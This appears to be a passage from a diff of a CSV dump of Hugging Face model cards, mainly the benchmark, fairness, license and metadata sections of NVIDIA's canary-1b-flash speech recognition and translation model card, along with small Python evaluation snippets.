The tokenizers for these models were built using the text transcripts of the train set with this [script](https://github.com/NVIDIA/NeMo/blob/main/scripts/tokenizers/process_asr_text_tokenizer.py).
|
| 488 |
+
|
| 489 |
+
## Inference:
|
| 490 |
+
**Engine:** NVIDIA NeMo <br>
|
| 491 |
+
**Test Hardware :** <br>
|
| 492 |
+
* A6000 <br>
|
| 493 |
+
* A100 <br>
|
| 494 |
+
* V100 <br>
|
| 495 |
+
|
| 496 |
+
## Performance
|
| 497 |
+
|
| 498 |
+
For ASR and AST experiments, predictions were generated using greedy decoding. Note that utterances shorter than 1 second are symmetrically zero-padded up to 1 second during evaluation.
|
| 499 |
+
|
| 500 |
+
### English ASR Performance (w/o PnC)
|
| 501 |
+
|
| 502 |
+
The ASR performance is measured with word error rate (WER), and we process the ground-truth and predicted text with [whisper-normalizer](https://pypi.org/project/whisper-normalizer/).
|
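As an illustration of this pipeline, a sketch using the whisper-normalizer package named above, together with jiwer for the WER computation (jiwer is an assumption here; any WER implementation works):

```python
# Normalize reference and hypothesis text, then compute WER, as described above.
from whisper_normalizer.english import EnglishTextNormalizer
import jiwer

normalizer = EnglishTextNormalizer()
reference = normalizer('The cat sat on the mat.')
hypothesis = normalizer('the cat sat on a mat')
print(jiwer.wer(reference, hypothesis))  # WER after text normalization
```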
| 503 |
+
|
| 504 |
+
WER on [HuggingFace OpenASR leaderboard](https://huggingface.co/spaces/hf-audio/open_asr_leaderboard):
|
| 505 |
+
|
| 506 |
+
| **Version** | **Model** | **RTFx** | **AMI** | **GigaSpeech** | **LS Clean** | **LS Other** | **Earnings22** | **SPGISpeech** | **Tedlium** | **Voxpopuli** |
|
| 507 |
+
|:---------:|:-----------:|:------:|:------:|:------:|:------:|:------:|:------:|:------:|:------:|:------:|
|
| 508 |
+
| nemo-main | canary-1b-flash | 1045.75 | 13.11 | 9.85 | 1.48 | 2.87 | 12.79 | 1.95 | 3.12 | 5.63 |
|
| 509 |
+
|
| 510 |
+
#### Inference speed on different systems
|
| 511 |
+
We profiled inference speed on the OpenASR benchmark (batch_size=128) using the [real-time factor](https://github.com/NVIDIA/DeepLearningExamples/blob/master/Kaldi/SpeechRecognition/README.md#metrics) (RTFx) to quantify throughput.
|
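In the throughput form used here, RTFx is simply the total audio duration divided by the total processing time; a minimal sketch:

```python
# Illustrative RTFx computation: audio seconds transcribed per second of compute.
def rtfx(total_audio_seconds: float, total_processing_seconds: float) -> float:
    return total_audio_seconds / total_processing_seconds

# e.g. one hour of audio processed in ~3.4 s corresponds to an RTFx of roughly 1050
print(rtfx(3600.0, 3.44))
```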
| 512 |
+
|
| 513 |
+
| **Version** | **Model** | **System** | **RTFx** |
|
| 514 |
+
|:-----------:|:-------------:|:------------:|:----------:|
|
| 515 |
+
| nemo-main | canary-1b-flash | NVIDIA A100 | 1045.75 |
|
| 516 |
+
| nemo-main | canary-1b-flash | NVIDIA H100 | 1669.07 |
|
| 517 |
+
|
| 518 |
+
|
| 519 |
+
|
| 520 |
+
### Multilingual ASR Performance
|
| 521 |
+
|
| 522 |
+
WER on [MLS](https://huggingface.co/datasets/facebook/multilingual_librispeech) test set:
|
| 523 |
+
|
| 524 |
+
| **Version** | **Model** | **De** | **Es** | **Fr** |
|
| 525 |
+
|:---------:|:-----------:|:------:|:------:|:------:|
|
| 526 |
+
| nemo-main | canary-1b-flash | 4.36 | 2.69 | 4.47 |
|
| 527 |
+
|
| 528 |
+
WER on [MCV-16.1](https://commonvoice.mozilla.org/en/datasets) test set:
|
| 529 |
+
| **Version** | **Model** | **En** | **De** | **Es** | **Fr** |
|
| 530 |
+
|:---------:|:-----------:|:------:|:------:|:------:|:------:|
|
| 531 |
+
| nemo-main | canary-1b-flash | 6.99 | 4.09 | 3.62 | 6.15 |
|
| 532 |
+
|
| 533 |
+
|
| 534 |
+
More details on evaluation can be found at the [HuggingFace ASR Leaderboard](https://huggingface.co/spaces/hf-audio/open_asr_leaderboard).
|
| 535 |
+
|
| 536 |
+
### AST Performance
|
| 537 |
+
|
| 538 |
+
We evaluate AST performance with [BLEU score](https://lightning.ai/docs/torchmetrics/stable/text/sacre_bleu_score.html) and [COMET score](https://aclanthology.org/2020.emnlp-main.213/), and use native annotations with punctuation and capitalization in the datasets.
|
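For reference, a minimal sketch of the BLEU computation using sacreBLEU (COMET can be scored analogously with the Unbabel COMET package; both tool choices here are assumptions, and the sentences are placeholders):

```python
# Corpus-level BLEU over hypothesis/reference pairs, as used for AST above.
import sacrebleu

hypotheses = ['Das ist ein kleiner Test.']
references = [['Das ist ein kleiner Test.']]  # one inner list per reference set
print(sacrebleu.corpus_bleu(hypotheses, references).score)  # 100.0 for an exact match
```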
| 539 |
+
|
| 540 |
+
[FLEURS](https://huggingface.co/datasets/google/fleurs) test set:
|
| 541 |
+
|
| 542 |
+
BLEU score:
|
| 543 |
+
| **Version** | **Model** | **En->De** | **En->Es** | **En->Fr** | **De->En** | **Es->En** | **Fr->En** |
|
| 544 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|:----------:|:----------:|:----------:|
|
| 545 |
+
| nemo-main | canary-1b-flash | 32.27 | 22.6 | 41.22 | 35.5 | 23.32 | 33.42 |
|
| 546 |
+
|
| 547 |
+
COMET score:
|
| 548 |
+
| **Version** | **Model** | **En->De** | **En->Es** | **En->Fr** | **De->En** | **Es->En** | **Fr->En** |
|
| 549 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|:----------:|:----------:|:----------:|
|
| 550 |
+
| nemo-main | canary-1b-flash | 0.8114 | 0.8118 | 0.8165 | 0.8546 | 0.8228 | 0.8475 |
|
| 551 |
+
|
| 552 |
+
[COVOST-v2](https://github.com/facebookresearch/covost) test set:
|
| 553 |
+
|
| 554 |
+
BLEU score:
|
| 555 |
+
| **Version** | **Model** | **De->En** | **Es->En** | **Fr->En** |
|
| 556 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|
|
| 557 |
+
| nemo-main | canary-1b-flash | 39.33 | 41.86 | 41.43 |
|
| 558 |
+
|
| 559 |
+
COMET score:
|
| 560 |
+
| **Version** | **Model** | **De->En** | **Es->En** | **Fr->En** |
|
| 561 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|
|
| 562 |
+
| nemo-main | canary-1b-flash | 0.8553 | 0.8585 | 0.8511 |
|
| 563 |
+
|
| 564 |
+
[mExpresso](https://huggingface.co/facebook/seamless-expressive#mexpresso-multilingual-expresso) test set:
|
| 565 |
+
|
| 566 |
+
BLEU score:
|
| 567 |
+
| **Version** | **Model** | **En->De** | **En->Es** | **En->Fr** |
|
| 568 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|
|
| 569 |
+
| nemo-main | canary-1b-flash | 22.91 | 35.69 | 27.85 |
|
| 570 |
+
|
| 571 |
+
COMET score:
|
| 572 |
+
| **Version** | **Model** | **En->De** | **En->Es** | **En->Fr** |
|
| 573 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|
|
| 574 |
+
| nemo-main | canary-1b-flash | 0.7889 | 0.8211 | 0.7910 |
|
| 575 |
+
|
| 576 |
+
### Timestamp Prediction
|
| 577 |
+
F1-score on [Librispeech Test sets](https://www.openslr.org/12) at a collar value of 200 ms
|
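Here a predicted word boundary counts as correct when it falls within the collar of the reference boundary; an illustrative sketch of that matching rule:

```python
# A boundary prediction is a hit if it lies within +/- 200 ms of the reference.
def within_collar(pred_time: float, ref_time: float, collar: float = 0.2) -> bool:
    return abs(pred_time - ref_time) <= collar

print(within_collar(1.15, 1.00))  # True: 150 ms deviation is inside the 200 ms collar
```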
| 578 |
+
| **Version** | **Model** | **test-clean** | **test-other** |
|
| 579 |
+
|:-----------:|:---------:|:----------:|:----------:|
|
| 580 |
+
| nemo-main | canary-1b-flash | 95.5 | 93.5 |
|
| 581 |
+
|
| 582 |
+
|
| 583 |
+
### Hallucination Robustness
|
| 584 |
+
Number of characters per minute on [MUSAN](https://www.openslr.org/17) 48 hrs eval set
|
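The metric counts how much text the model emits on purely non-speech audio (lower is better); an illustrative computation:

```python
# Characters hallucinated per minute of non-speech audio.
def chars_per_minute(transcripts: list, total_audio_minutes: float) -> float:
    return sum(len(t) for t in transcripts) / total_audio_minutes

print(chars_per_minute(['', 'the the the'], 2.0))  # 5.5 characters per minute
```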
| 585 |
+
| **Version** | **Model** | **# of characters per minute** |
|
| 586 |
+
|:-----------:|:---------:|:----------:|
|
| 587 |
+
| nemo-main | canary-1b-flash | 60.92 |
|
| 588 |
+
|
| 589 |
+
### Noise Robustness
|
| 590 |
+
WER on [Librispeech Test Clean](https://www.openslr.org/12) at different SNR (signal-to-noise ratio) levels of additive white noise
|
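For context, additive white noise at a target SNR scales zero-mean Gaussian noise against the signal power; a minimal sketch (NumPy assumed):

```python
# Mix white Gaussian noise into a signal at a requested SNR (in dB).
import numpy as np

def add_white_noise(signal: np.ndarray, snr_db: float) -> np.ndarray:
    signal_power = np.mean(signal ** 2)
    noise_power = signal_power / (10 ** (snr_db / 10))
    noise = np.random.randn(*signal.shape) * np.sqrt(noise_power)
    return signal + noise
```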
| 591 |
+
|
| 592 |
+
| **Version** | **Model** | **SNR 10** | **SNR 5** | **SNR 0** | **SNR -5** |
|
| 593 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|:----------:|
|
| 594 |
+
| nemo-main | canary-1b-flash | 2.34 | 3.69 | 8.84 | 29.71 |
|
| 595 |
+
|
| 596 |
+
## Model Fairness Evaluation
|
| 597 |
+
|
| 598 |
+
As outlined in the paper ""Towards Measuring Fairness in AI: the Casual Conversations Dataset"" [9], we assessed the canary-1b-flash model for fairness. The model was evaluated on the Casual Conversations v1 dataset, and the results are as follows:
|
| 599 |
+
|
| 600 |
+
### Gender Bias:
|
| 601 |
+
|
| 602 |
+
| Gender | Male | Female | N/A | Other |
|
| 603 |
+
| :--- | :--- | :--- | :--- | :--- |
|
| 604 |
+
| Num utterances | 19325 | 24532 | 926 | 33 |
|
| 605 |
+
| % WER | 14.66 | 12.44 | 17.17 | 27.56 |
|
| 606 |
+
|
| 607 |
+
### Age Bias:
|
| 608 |
+
|
| 609 |
+
| Age Group | (18-30) | (31-45) | (46-85) | (1-100) |
|
| 610 |
+
| :--- | :--- | :--- | :--- | :--- |
|
| 611 |
+
| Num utterances | 15956 | 14585 | 13349 | 43890 |
|
| 612 |
+
| % WER | 13.18 | 13.45 | 13.64 | 13.41 |
|
| 613 |
+
|
| 614 |
+
(Error rates for fairness evaluation are determined by normalizing both the reference and predicted text, similar to the methods used in the evaluations found at https://github.com/huggingface/open_asr_leaderboard.)
|
| 615 |
+
|
| 616 |
+
## License/Terms of Use:
|
| 617 |
+
canary-1b-flash is released under the CC-BY-4.0 license. By using this model, you are agreeing to the [terms and conditions](https://choosealicense.com/licenses/cc-by-4.0/) of the license. <br>
|
| 618 |
+
|
| 619 |
+
## References:
|
| 620 |
+
[1] [Training and Inference Efficiency of Encoder-Decoder Speech Models](https://arxiv.org/abs/2503.05931)
|
| 621 |
+
|
| 622 |
+
[2] [Less is More: Accurate Speech Recognition & Translation without Web-Scale Data](https://www.isca-archive.org/interspeech_2024/puvvada24_interspeech.pdf)
|
| 623 |
+
|
| 624 |
+
[3] [Fast Conformer with Linearly Scalable Attention for Efficient Speech Recognition](https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=10389701)
|
| 625 |
+
|
| 626 |
+
[4] [Attention is All You Need](https://arxiv.org/abs/1706.03762)
|
| 627 |
+
|
| 628 |
+
[5] [Unified Model for Code-Switching Speech Recognition and Language Identification Based on Concatenated Tokenizer](https://aclanthology.org/2023.calcs-1.7.pdf)
|
| 629 |
+
|
| 630 |
+
[6] [Google Sentencepiece Tokenizer](https://github.com/google/sentencepiece)
|
| 631 |
+
|
| 632 |
+
[7] [NVIDIA NeMo Framework](https://github.com/NVIDIA/NeMo)
|
| 633 |
+
|
| 634 |
+
[8] [EMMeTT: Efficient Multimodal Machine Translation Training](https://arxiv.org/abs/2409.13523)
|
| 635 |
+
|
| 636 |
+
[9] [Towards Measuring Fairness in AI: the Casual Conversations Dataset](https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=9634168)
|
| 637 |
+
|
| 638 |
+
|
| 639 |
+
## Ethical Considerations:
|
| 640 |
+
NVIDIA believes Trustworthy AI is a shared responsibility and we have established policies and practices to enable development for a wide array of AI applications. When downloaded or used in accordance with our terms of service, developers should work with their internal model team to ensure this model meets requirements for the relevant industry and use case and addresses unforeseen product misuse.
|
| 641 |
+
Please report security vulnerabilities or NVIDIA AI Concerns [here](https://www.nvidia.com/en-us/support/submit-security-vulnerability/).","{""id"": ""nvidia/canary-1b-flash"", ""author"": ""nvidia"", ""sha"": ""dcb25300f314472d4632dc6f111bcd63b1f436b1"", ""last_modified"": ""2025-03-18 23:42:31+00:00"", ""created_at"": ""2025-03-07 22:29:17+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 118870, ""downloads_all_time"": null, ""likes"": 186, ""library_name"": ""nemo"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""nemo"", ""automatic-speech-recognition"", ""automatic-speech-translation"", ""speech"", ""audio"", ""Transformer"", ""FastConformer"", ""Conformer"", ""pytorch"", ""NeMo"", ""hf-asr-leaderboard"", ""en"", ""de"", ""es"", ""fr"", ""dataset:librispeech_asr"", ""dataset:fisher_corpus"", ""dataset:Switchboard-1"", ""dataset:WSJ-0"", ""dataset:WSJ-1"", ""dataset:National-Singapore-Corpus-Part-1"", ""dataset:National-Singapore-Corpus-Part-6"", ""dataset:vctk"", ""dataset:voxpopuli"", ""dataset:europarl"", ""dataset:multilingual_librispeech"", ""dataset:mozilla-foundation/common_voice_8_0"", ""dataset:MLCommons/peoples_speech"", ""arxiv:2104.02821"", ""arxiv:2503.05931"", ""arxiv:1706.03762"", ""arxiv:2409.13523"", ""license:cc-by-4.0"", ""model-index"", ""region:us""], ""pipeline_tag"": ""automatic-speech-recognition"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- librispeech_asr\n- fisher_corpus\n- Switchboard-1\n- WSJ-0\n- WSJ-1\n- National-Singapore-Corpus-Part-1\n- National-Singapore-Corpus-Part-6\n- vctk\n- voxpopuli\n- europarl\n- multilingual_librispeech\n- mozilla-foundation/common_voice_8_0\n- MLCommons/peoples_speech\nlanguage:\n- en\n- de\n- es\n- fr\nlibrary_name: nemo\nlicense: cc-by-4.0\nmetrics:\n- wer\n- bleu\n- comet\npipeline_tag: automatic-speech-recognition\ntags:\n- automatic-speech-recognition\n- automatic-speech-translation\n- speech\n- audio\n- Transformer\n- FastConformer\n- Conformer\n- pytorch\n- NeMo\n- hf-asr-leaderboard\nwidget:\n- example_title: Librispeech sample 1\n src: https://cdn-media.huggingface.co/speech_samples/sample1.flac\n- example_title: Librispeech sample 2\n src: https://cdn-media.huggingface.co/speech_samples/sample2.flac\nmodel-index:\n- name: canary-1b-flash\n results:\n - task:\n type: automatic-speech-recognition\n name: Automatic Speech Recognition\n dataset:\n name: LibriSpeech (other)\n type: librispeech_asr\n config: other\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 2.87\n name: Test WER\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: SPGI Speech\n type: kensho/spgispeech\n config: test\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 1.95\n name: Test WER\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: en\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 6.99\n name: Test WER (En)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: de\n split: test\n args:\n language: de\n metrics:\n - type: wer\n value: 4.09\n name: Test WER (De)\n verified: false\n - task:\n type: Automatic Speech 
Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: es\n split: test\n args:\n language: es\n metrics:\n - type: wer\n value: 3.62\n name: Test WER (ES)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: fr\n split: test\n args:\n language: fr\n metrics:\n - type: wer\n value: 6.15\n name: Test WER (Fr)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: en_us\n split: test\n args:\n language: en-de\n metrics:\n - type: bleu\n value: 32.27\n name: Test BLEU (En->De)\n verified: false\n - type: bleu\n value: 22.6\n name: Test BLEU (En->Es)\n verified: false\n - type: bleu\n value: 41.22\n name: Test BLEU (En->Fr)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: de_de\n split: test\n args:\n language: de-en\n metrics:\n - type: bleu\n value: 35.5\n name: Test BLEU (De->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: es_419\n split: test\n args:\n language: es-en\n metrics:\n - type: bleu\n value: 23.32\n name: Test BLEU (Es->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: fr_fr\n split: test\n args:\n language: fr-en\n metrics:\n - type: bleu\n value: 33.42\n name: Test BLEU (Fr->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: de_de\n split: test\n args:\n language: de-en\n metrics:\n - type: bleu\n value: 39.33\n name: Test BLEU (De->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: es_419\n split: test\n args:\n language: es-en\n metrics:\n - type: bleu\n value: 41.86\n name: Test BLEU (Es->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: fr_fr\n split: test\n args:\n language: fr-en\n metrics:\n - type: bleu\n value: 41.43\n name: Test BLEU (Fr->En)\n verified: false"", ""widget_data"": [{""example_title"": ""Librispeech sample 1"", ""src"": ""https://cdn-media.huggingface.co/speech_samples/sample1.flac""}, {""example_title"": ""Librispeech sample 2"", ""src"": ""https://cdn-media.huggingface.co/speech_samples/sample2.flac""}], ""model_index"": [{""name"": ""canary-1b-flash"", ""results"": [{""task"": {""name"": ""Automatic Speech Recognition"", ""type"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""LibriSpeech (other)"", ""type"": ""librispeech_asr"", ""config"": ""other"", ""split"": ""test"", ""args"": {""language"": ""en""}}, ""metrics"": [{""name"": ""Test WER"", ""type"": ""wer"", ""value"": 2.87, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""SPGI Speech"", ""type"": ""kensho/spgispeech"", ""config"": ""test"", ""split"": ""test"", ""args"": {""language"": 
""en""}}, ""metrics"": [{""name"": ""Test WER"", ""type"": ""wer"", ""value"": 1.95, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""Mozilla Common Voice 16.1"", ""type"": ""mozilla-foundation/common_voice_16_1"", ""config"": ""en"", ""split"": ""test"", ""args"": {""language"": ""en""}}, ""metrics"": [{""name"": ""Test WER (En)"", ""type"": ""wer"", ""value"": 6.99, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""Mozilla Common Voice 16.1"", ""type"": ""mozilla-foundation/common_voice_16_1"", ""config"": ""de"", ""split"": ""test"", ""args"": {""language"": ""de""}}, ""metrics"": [{""name"": ""Test WER (De)"", ""type"": ""wer"", ""value"": 4.09, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""Mozilla Common Voice 16.1"", ""type"": ""mozilla-foundation/common_voice_16_1"", ""config"": ""es"", ""split"": ""test"", ""args"": {""language"": ""es""}}, ""metrics"": [{""name"": ""Test WER (ES)"", ""type"": ""wer"", ""value"": 3.62, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""Mozilla Common Voice 16.1"", ""type"": ""mozilla-foundation/common_voice_16_1"", ""config"": ""fr"", ""split"": ""test"", ""args"": {""language"": ""fr""}}, ""metrics"": [{""name"": ""Test WER (Fr)"", ""type"": ""wer"", ""value"": 6.15, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""en_us"", ""split"": ""test"", ""args"": {""language"": ""en-de""}}, ""metrics"": [{""name"": ""Test BLEU (En->De)"", ""type"": ""bleu"", ""value"": 32.27, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""en_us"", ""split"": ""test"", ""args"": {""language"": ""en-de""}}, ""metrics"": [{""name"": ""Test BLEU (En->Es)"", ""type"": ""bleu"", ""value"": 22.6, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""en_us"", ""split"": ""test"", ""args"": {""language"": ""en-de""}}, ""metrics"": [{""name"": ""Test BLEU (En->Fr)"", ""type"": ""bleu"", ""value"": 41.22, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""de_de"", ""split"": ""test"", ""args"": {""language"": ""de-en""}}, ""metrics"": [{""name"": ""Test BLEU (De->En)"", ""type"": ""bleu"", ""value"": 35.5, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""es_419"", ""split"": ""test"", ""args"": {""language"": ""es-en""}}, ""metrics"": [{""name"": ""Test BLEU (Es->En)"", ""type"": ""bleu"", ""value"": 23.32, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": 
""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""fr_fr"", ""split"": ""test"", ""args"": {""language"": ""fr-en""}}, ""metrics"": [{""name"": ""Test BLEU (Fr->En)"", ""type"": ""bleu"", ""value"": 33.42, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""COVOST"", ""type"": ""covost2"", ""config"": ""de_de"", ""split"": ""test"", ""args"": {""language"": ""de-en""}}, ""metrics"": [{""name"": ""Test BLEU (De->En)"", ""type"": ""bleu"", ""value"": 39.33, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""COVOST"", ""type"": ""covost2"", ""config"": ""es_419"", ""split"": ""test"", ""args"": {""language"": ""es-en""}}, ""metrics"": [{""name"": ""Test BLEU (Es->En)"", ""type"": ""bleu"", ""value"": 41.86, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""COVOST"", ""type"": ""covost2"", ""config"": ""fr_fr"", ""split"": ""test"", ""args"": {""language"": ""fr-en""}}, ""metrics"": [{""name"": ""Test BLEU (Fr->En)"", ""type"": ""bleu"", ""value"": 41.43, ""verified"": false}]}]}], ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='canary-1b-flash.nemo', size=None, blob_id=None, lfs=None)""], ""spaces"": [""nvidia/canary-1b-flash"", ""Huggingfacest/canary-180m-flash""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-18 23:42:31+00:00"", ""cardData"": ""datasets:\n- librispeech_asr\n- fisher_corpus\n- Switchboard-1\n- WSJ-0\n- WSJ-1\n- National-Singapore-Corpus-Part-1\n- National-Singapore-Corpus-Part-6\n- vctk\n- voxpopuli\n- europarl\n- multilingual_librispeech\n- mozilla-foundation/common_voice_8_0\n- MLCommons/peoples_speech\nlanguage:\n- en\n- de\n- es\n- fr\nlibrary_name: nemo\nlicense: cc-by-4.0\nmetrics:\n- wer\n- bleu\n- comet\npipeline_tag: automatic-speech-recognition\ntags:\n- automatic-speech-recognition\n- automatic-speech-translation\n- speech\n- audio\n- Transformer\n- FastConformer\n- Conformer\n- pytorch\n- NeMo\n- hf-asr-leaderboard\nwidget:\n- example_title: Librispeech sample 1\n src: https://cdn-media.huggingface.co/speech_samples/sample1.flac\n- example_title: Librispeech sample 2\n src: https://cdn-media.huggingface.co/speech_samples/sample2.flac\nmodel-index:\n- name: canary-1b-flash\n results:\n - task:\n type: automatic-speech-recognition\n name: Automatic Speech Recognition\n dataset:\n name: LibriSpeech (other)\n type: librispeech_asr\n config: other\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 2.87\n name: Test WER\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: SPGI Speech\n type: kensho/spgispeech\n config: test\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 1.95\n name: Test WER\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: en\n split: test\n args:\n language: en\n metrics:\n - type: 
wer\n value: 6.99\n name: Test WER (En)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: de\n split: test\n args:\n language: de\n metrics:\n - type: wer\n value: 4.09\n name: Test WER (De)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: es\n split: test\n args:\n language: es\n metrics:\n - type: wer\n value: 3.62\n name: Test WER (ES)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: fr\n split: test\n args:\n language: fr\n metrics:\n - type: wer\n value: 6.15\n name: Test WER (Fr)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: en_us\n split: test\n args:\n language: en-de\n metrics:\n - type: bleu\n value: 32.27\n name: Test BLEU (En->De)\n verified: false\n - type: bleu\n value: 22.6\n name: Test BLEU (En->Es)\n verified: false\n - type: bleu\n value: 41.22\n name: Test BLEU (En->Fr)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: de_de\n split: test\n args:\n language: de-en\n metrics:\n - type: bleu\n value: 35.5\n name: Test BLEU (De->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: es_419\n split: test\n args:\n language: es-en\n metrics:\n - type: bleu\n value: 23.32\n name: Test BLEU (Es->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: fr_fr\n split: test\n args:\n language: fr-en\n metrics:\n - type: bleu\n value: 33.42\n name: Test BLEU (Fr->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: de_de\n split: test\n args:\n language: de-en\n metrics:\n - type: bleu\n value: 39.33\n name: Test BLEU (De->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: es_419\n split: test\n args:\n language: es-en\n metrics:\n - type: bleu\n value: 41.86\n name: Test BLEU (Es->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: fr_fr\n split: test\n args:\n language: fr-en\n metrics:\n - type: bleu\n value: 41.43\n name: Test BLEU (Fr->En)\n verified: false"", ""transformersInfo"": null, ""_id"": ""67cb733d42ae7a25491e3700"", ""modelId"": ""nvidia/canary-1b-flash"", ""usedStorage"": 3540715520}",0,,0,,0,,0,,0,"Huggingfacest/canary-180m-flash, hf-audio/open_asr_leaderboard, huggingface/InferenceSupport/discussions/89, nvidia/canary-1b-flash",4
|
chatgpt_paraphraser_on_T5_base_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
|
@@ -0,0 +1,333 @@
|
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
|
| 2 |
+
humarin/chatgpt_paraphraser_on_T5_base,"---
|
| 3 |
+
license: openrail
|
| 4 |
+
